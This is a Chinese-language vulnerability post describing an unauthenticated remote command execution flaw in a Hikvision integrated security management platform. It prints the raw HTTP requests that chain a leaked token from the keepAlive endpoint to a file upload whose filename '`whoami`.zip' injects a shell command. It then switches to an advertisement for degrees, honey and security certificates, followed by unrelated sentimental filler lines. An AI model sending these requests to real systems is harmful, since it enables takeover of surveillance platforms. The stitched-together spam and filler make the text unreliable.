海康威视部分综合安防管理平台历史版本由于对上传文件接口校验不
足,攻击者可以将恶意文件上传到平台,导致获取服务权限或服务异常。
海康威视运行管理中心前台存在命令执行漏洞利用详情:运行管理中
心:/svm/api/v1/productFile 接口,仅对 token 有效性进行校验,利用
/iac/configService/v1/keepAlive 接口中泄漏的 token 即可对该接口进行未
授权访问。/svm/api/v1/productFile 接口可上传的压缩包,对压缩包文件的解压命令直接拼接了用户传入的 filename 参数导致远程命令执行。
详细分析可参考
漏洞复现综合安防管理平台_svm_api_v1_productFile 远程命令执行
。
POST /iac/configService/v1/keepAlive HTTP/1.1User-Agent: threatbook-security-vulnerability-detectionAccept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveHost:
POST /svm/api/v1/productFile?type=product&ip=127.0.0.1&agentNo=1 HTTP/1.1Accept: text/html,application/json,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 HutoolToken: Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Content-Type: multipart/form-data; boundary=--------------------Hutool_gklaw597evbu8p1bCache-Control: no-cachePragma: no-cacheHost: Connection: keep-aliveContent-Length: 173
----------------------Hutool_gklaw597evbu8p1bContent-Disposition: form-data; name="file"; filename="`whoami`.zip"
123----------------------Hutool_gklaw597evbu8p1b--
🍻
🍻
🍻
🍻
🍻
🍻
有需要学历提升、蜂蜜、安全证书的可以加好友私聊
在时光的长河中,人生的每一次波澜,都是岁月对我们的温柔抚摸。
每一缕清晨的阳光,都在提醒我们,新的一天又是一个充满可能性的开始。
在繁忙的都市中,偶尔驻足片刻,你会发现生活中那些细小的美好瞬间,如同晨露般晶莹剔透。
岁月如诗,时光如歌,每一个足迹都是我们生命旋律中的一个音符。
在夜深人静的时候,听着风的低语,仿佛能听到自己心底最真实的声音。
生命中的每一次相遇,都是时光赐予我们的礼物,哪怕只是短暂的擦肩,也有其独特的意义。
走过四季,仿佛在阅读一本厚重的书,每一页都记载着我们曾经的欢笑与泪水。
当我们凝视星空,仰望无尽的宇宙,心中那些渺小的烦恼便会随风飘散。
在繁花似锦的春天,我们学会了希望;在叶落归根的秋天,我们学会了珍惜。
人的一生,如同一条蜿蜒的河流,经历了曲折与波折,最终汇入那宁静的海洋。
